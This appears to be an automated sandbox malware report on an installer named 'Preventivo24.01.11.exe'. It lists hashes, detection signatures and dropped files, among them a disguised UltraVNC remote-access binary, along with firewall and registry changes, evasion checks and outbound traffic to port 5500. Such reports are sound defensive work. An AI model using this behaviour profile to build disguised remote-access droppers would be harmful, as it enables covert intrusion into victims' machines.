Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name: Preventivo24.01.11.exe
Analysis ID: 1379424
MD5: 32f35b78a3dc5949ce3c99f2981def6b
SHA1: 18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256: 0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags: exe
Infos:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: Preventivo24.01.11.exe Virustotal: Detection: 17% Perma Link
Uses 32bit PE files
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI54C4.tmp.0.dr, MSI5406.tmp.0.dr, MSI54A3.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A05220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00A05220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1D700 FindFirstFileW,GetLastError,FindClose, 0_2_00B1D700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B68B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B68B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1CDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00B1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B43210 FindFirstFileW,FindClose, 0_2_00B43210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFF570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00AFF570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B53790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53C10 FindFirstFileW,FindClose, 0_2_00B53C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B2BFF0 FindFirstFileW,FindClose,FindClose, 0_2_00B2BFF0
Source: C:\Games\viewer.exe Code function: 7_2_0099BC3B FindFirstFileExW, 7_2_0099BC3B
Source: C:\Games\taskhost.exe Code function: 42_2_0059EC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 42_2_0059EC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B52400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00B52400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\ Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 140.228.29.110:5500
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: www.example.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 589411Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:07:53 GMTExpires: Tue, 30 Jan 2024 11:07:53 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
Source: shi5398.tmp.0.dr String found in binary or memory: http://.css
Source: shi5398.tmp.0.dr String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2031375134.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.00000000054EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.2031997529.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033927327.00000000054B4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1996726609.0000000005591000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b248e132c788
Source: shi5398.tmp.0.dr String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
